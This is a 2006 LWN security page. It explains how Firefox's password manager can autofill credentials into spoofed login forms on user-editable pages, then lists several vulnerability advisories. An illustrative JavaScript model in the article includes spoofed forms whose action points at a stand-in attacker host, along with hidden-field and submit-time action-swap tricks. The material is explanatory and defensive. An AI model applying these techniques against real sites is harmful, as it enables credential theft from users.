

The Firefox password manager vulnerability

November 29, 2006

This article was contributed by Jake Edge.

A commonly used convenience feature in Firefox is the password manager (PM), which keeps track of username/password pairs for the sites one visits and fills them in the next time a login is required. Unfortunately, as a recent bug report shows, the PM can be too helpful and hand that information to other sites, invisibly to the user. As of this writing, the underlying browser problem has not been fixed, though MySpace (where the problem was originally discovered in the wild) has changed its filtering of user-supplied HTML to avoid it.

When visiting a page with a login form, Firefox checks its list of stored credentials to see if it has a set matching those requested by the page. How it makes that decision is the crux of the vulnerability. Currently, it looks only at the domain name portion of the page's URL and the names of the input fields in the login form to decide whether there is a match. If there is exactly one match, it automatically fills in the username and password, and the user need only press the "Login" button to authenticate. If there are several matches, the username field becomes a drop-down containing all of the possibilities; when a particular username is chosen, the associated password is filled in.

Under normal circumstances this works fine, but attackers are always willing to alter the underlying assumptions, and that is what has occurred here. On sites like MySpace that allow users to put HTML into their own pages, someone with malicious intent can mimic the MySpace login form on their page; Firefox will happily fill in the blanks on the spoofed form because the domain and field names match. Users might well believe that they had been logged off for some reason and press the login button, which then sends the credentials to whatever URL the form's ACTION attribute points to. This new kind of attack has been called a Reverse Cross-site Request (RCSR) by Robert Chapin, who reported the Firefox bug.

This mechanism has much in common with standard phishing techniques, in that it tricks the user into sending their password to the attacker, but it has a few twists. A typical phishing site lives on its own domain, so there is no matching entry in the PM and Firefox will not automatically fill in the form. In addition, there is no reason the username and password fields need be visible for this attack to work: by using CSS (hidden elements or off-screen absolute positioning), the attacker can hide the fields from the user, but Firefox fills them in anyway. The user will believe they are submitting a benign, unrelated form when, in fact, they are providing their credentials to an attacker.

Other browsers are susceptible to this attack as well, but because of some user interface differences, the impact is lessened. Opera provides a 'magic wand' icon that a user can press when they want to provide their credentials to a matching site; IE7 requires one to choose the username from a drop-down (even if there is only one choice), unless the URL is exactly the same as the one stored with the password. These differences alleviate the problem with invisible form fields, but could still be used by login form mimics to trap the unwary.

The discussion of possible fixes in the bug report is instructive, as there is no real panacea for this problem on the browser side. Several of the comments maintain that it is entirely a server-side issue and that sites must take steps to ensure that what they serve does not contain this kind of content. Unfortunately for Firefox users and developers, that simplistic approach will not suffice. The root of the problem lies in which portion of a URL is considered significant for identifying the specific site that a stored credential belongs to.

It is worth noting how many different ways one can end up on a login page while traversing the web, and how many different URLs lead to it. One way to ensure that an RCSR cannot occur is to require that the URL stored with the password match the URL of the requesting page exactly before filling in credentials. That test breaks on a wide variety of web sites, because they attach various parameters to the URL (navigation information, for example), and such a check would seriously degrade the usefulness of the PM. A less severe check could match the URL up to the start of any parameters, but some sites use different hosts and paths for handling credentials, and a user would have to store a password for each of those URLs. Checking the ACTION attribute of the form being submitted has also been suggested, but JavaScript can change that attribute on the fly, at submit time, and that capability is used for legitimate reasons.
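To make the trade-offs concrete, the following JavaScript is an added illustration, not code from Firefox or from the bug report. It models the matching rule described earlier (domain name plus field names) alongside the three stricter policies discussed above, and runs each against a constructed spoofed form embedded in a user profile page, the genuine login page reached with an extra navigation parameter, and a form whose ACTION is rewritten from script at submit time. The host names, field names, credentials and URLs are all invented, and the policies are simplified models of what a browser might do, not Firefox's actual implementation.

```javascript
// Added example, not Firefox code: a model of the password-manager
// matching policies discussed in the article, run against constructed
// login forms. All hosts, paths, field names and credentials are made up.

// One stored password-manager entry (constructed sample data).
const STORED = [
  {
    url: "http://www.example-social.test/index.cfm?fuseaction=login",
    userField: "email",
    passField: "password",
    username: "alice@example.test",
    password: "hunter2",
  },
];

// A spoofed form as the browser would see it after parsing a user
// profile page: same field names as the real login form, same host,
// but the ACTION points at a third-party host (constructed). An attacker
// would also hide the inputs with CSS; none of the policies below look at
// visibility, so that is not modelled.
const SPOOFED_FORM = {
  pageUrl: "http://www.example-social.test/profile/attacker",
  action: "http://collector.attacker.test/steal",
  fields: ["email", "password"],
};

// The genuine login page, reached with a navigation parameter appended
// to the URL (constructed).
const GENUINE_FORM = {
  pageUrl: "http://www.example-social.test/index.cfm?fuseaction=login&nav=home",
  action: "http://www.example-social.test/index.cfm?fuseaction=login.process",
  fields: ["email", "password"],
};

// A spoofed form whose ACTION looks legitimate when the page loads and is
// swapped by script when the form is submitted (constructed).
const SWAPPING_FORM = {
  pageUrl: "http://www.example-social.test/profile/attacker",
  action: "http://www.example-social.test/index.cfm?fuseaction=login.process",
  fields: ["email", "password"],
  onsubmit: (f) => { f.action = "http://collector.attacker.test/steal"; },
};

const hostOf = (u) => new URL(u).hostname;
const pathOf = (u) => { const p = new URL(u); return p.hostname + p.pathname; };

// Matching policies:
//   "domain": stored and page URLs share a host, and the field names match
//             (the behaviour the article describes for Firefox)
//   "path":   host and path must match, query string ignored
//   "exact":  the page URL must equal the stored URL byte for byte
//   "action": "domain", plus the form's ACTION must be on the same host
function matchingEntries(stored, form, policy) {
  return stored.filter((e) => {
    const fieldsMatch =
      form.fields.includes(e.userField) && form.fields.includes(e.passField);
    if (!fieldsMatch) return false;
    switch (policy) {
      case "domain": return hostOf(e.url) === hostOf(form.pageUrl);
      case "path":   return pathOf(e.url) === pathOf(form.pageUrl);
      case "exact":  return e.url === form.pageUrl;
      case "action":
        return hostOf(e.url) === hostOf(form.pageUrl) &&
               hostOf(e.url) === hostOf(form.action);
      default: throw new Error("unknown policy: " + policy);
    }
  });
}

// One match is filled in silently, several become a drop-down, none
// means no autofill, as the article describes.
function autofillDecision(stored, form, policy) {
  const matches = matchingEntries(stored, form, policy);
  if (matches.length === 1) {
    return { fill: true, username: matches[0].username, password: matches[0].password };
  }
  if (matches.length > 1) return { fill: false, dropdown: matches.map((m) => m.username) };
  return { fill: false };
}

// Where the filled-in credentials actually go: any onsubmit script runs
// after the fill-time check, so it can redirect the POST.
function submitDestination(form) {
  const f = { ...form };
  if (typeof f.onsubmit === "function") f.onsubmit(f);
  return f.action;
}

function main() {
  for (const policy of ["domain", "path", "exact", "action"]) {
    const spoof = autofillDecision(STORED, SPOOFED_FORM, policy).fill;
    const real = autofillDecision(STORED, GENUINE_FORM, policy).fill;
    const swap = autofillDecision(STORED, SWAPPING_FORM, policy).fill;
    console.log(`${policy.padEnd(6)} spoofed=${spoof} genuine=${real} action-swap=${swap}`);
  }
  console.log("action-swap form submits to", submitDestination(SWAPPING_FORM));
}
main();
```

Running it shows the dilemma in one screen: only the "domain" policy fills the plainly spoofed form, but "exact" also refuses the genuine login page once a parameter is appended, and the "action" check is satisfied by the swapping form, which then redirects the credentials at submit time.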

It is unclear what direction the Firefox team will take in fixing this problem, but it seems likely to require some user interface change (along the lines of Opera or IE7) so that some kind of user interaction is required before credentials are filled in. It may also include stricter checking of the page and/or action URLs before deciding to fill in credentials. Pop-up warnings for content that fails these checks have been suggested as a solution, but it is hard to envision users paying any more attention to a new warning than they have to any of the current ones. There is a delicate balance for the developers to maintain between security and convenience, especially given the behavior that users have come to expect.

It is hard to imagine that most users, when storing their passwords, would expect Firefox to send them off to phishing sites without any kind of user interaction and without providing any visual indication that it is doing so. Website operators should certainly be doing better filtering, but the browser is the agent that the user has entrusted with their passwords. Claiming that there is no browser issue is a serious misunderstanding of user expectations when they store passwords.

Comments (36 posted)

Brief items

Remote code execution vulnerability in ProFTPD

If any of you are still running ProFTPD: there is a new vulnerability which allows execution of arbitrary code by a remote attacker, and an exploit is already in circulation. Upgrading to version 1.3.0a, which contains the fix, would be a very good idea.

Full Story (comments: 15)

New vulnerabilities

apache-mod_auth_kerb: off-by-one error

Package(s):apache-mod_auth_kerb CVE #(s):CVE-2006-5989
Created:November 24, 2006 Updated:January 23, 2007
Description: An off-by-one error in the der_get_oid function in mod_auth_kerb 5.0 allows remote attackers to cause a denial of service (crash) via a crafted Kerberos message that triggers a heap-based buffer overflow in the component array.
Gentoo 200701-14 mod_auth_kerb 2007-01-22
Debian DSA-1247-1 libapache-mod-auth-kerb 2007-01-08
Red Hat RHSA-2006:0746-01 mod_auth_kerb 2006-12-06
Fedora FEDORA-2006-1341 mod_auth_kerb 2006-11-29
Mandriva MDKSA-2006:218 apache-mod_auth_kerb 2006-11-23

Comments (none posted)

dovecot: index cache file handling error

Package(s):dovecot CVE #(s):CVE-2006-5973
Created:November 29, 2006 Updated:May 8, 2007
Description: The dovecot IMAP server has an error in its index cache file handling code which could be exploited by an authenticated user to execute arbitrary code. Only servers with the (non-default) mmap_disable=yes option setting are vulnerable.
Fedora FEDORA-2006-1504 dovecot 2006-12-27
Fedora FEDORA-2006-1396 dovecot 2006-12-18
rPath rPSA-2006-0220-1 dovecot 2006-11-30
Ubuntu USN-387-1 dovecot 2006-11-28

Comments (none posted)

fvwm: fvwm-menu-directory command injection

Package(s):fvwm CVE #(s):CVE-2006-5969
Created:November 24, 2006 Updated:November 29, 2006
Description: Tavis Ormandy of the Gentoo Linux Security Audit Team discovered that fvwm-menu-directory does not sufficiently sanitize directory names prior to generating menus. A local attacker who can convince an fvwm-menu-directory user to browse a directory they control could cause fvwm commands to be executed with the privileges of the fvwm user. Fvwm commands can be used to execute arbitrary shell commands.
Gentoo 200611-17 fvwm 2006-11-23

Comments (none posted)

imagemagick: buffer overflows

Package(s):imagemagick CVE #(s):CVE-2006-5868
Created:November 28, 2006 Updated:February 16, 2007
Description: Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges.
Red Hat RHSA-2007:0015-01 ImageMagick 2007-02-15
Mandriva MDKSA-2006:223 ImageMagick 2006-12-01
Ubuntu USN-386-1 imagemagick 2006-11-28

Comments (1 posted)

jbossas: arbitrary code execution

Package(s):jbossas CVE #(s):CVE-2006-5750
Created:November 27, 2006 Updated:November 29, 2006
Description: Symantec discovered a flaw in the DeploymentFileRepository class of the JBoss Application Server. A remote attacker who is able to access the console manager could read or write to files with the permissions of the JBoss user. This could potentially lead to arbitrary code execution as the jboss user.
Red Hat RHSA-2006:0743-01 jbossas 2006-11-27

Comments (none posted)

phpMyAdmin: several vulnerabilities

Package(s):phpMyAdmin CVE #(s):CVE-2006-3388 CVE-2006-5116 CVE-2006-5117 CVE-2006-5718
Created:November 24, 2006 Updated:November 29, 2006
Description: Several vulnerabilities have been fixed in a new phpMyAdmin version, including cross-site scripting and cross-site request forgery vulnerabilities.
SuSE SUSE-SA:2006:071 phpMyAdmin 2006-11-24

Comments (none posted)

pstotext: insecure file name quoting

Package(s):pstotext CVE #(s):CVE-2006-5869
Created:November 27, 2006 Updated:November 29, 2006
Description: Brian May discovered that pstotext, a utility to extract plain text from PostScript and PDF files, performs insufficient quoting of file names, which allows execution of arbitrary shell commands.
Debian DSA-1220-1 pstotext 2006-11-26

Comments (none posted)

tar: symlink vulnerability

Package(s):tar CVE #(s):CVE-2006-6097
Created:November 28, 2006 Updated:December 20, 2006
Description: Teemu Salmela discovered that tar still handles the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges.
Red Hat RHSA-2006:0749-01 tar 2006-12-19
Gentoo 200612-10 tar 2006-12-11
OpenPKG OpenPKG-SA-2006.038 tar 2006-12-08
Slackware SSA:2006-335-01 tar 2006-12-04
Debian DSA-1223-1 tar 2006-12-01
rPath rPSA-2006-0222-1 tar 2006-11-30
Mandriva MDKSA-2006:219 tar 2006-11-28
Ubuntu USN-385-1 tar 2006-11-27

Comments (none posted)

Page editor: Jonathan Corbet

Copyright © 2006, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds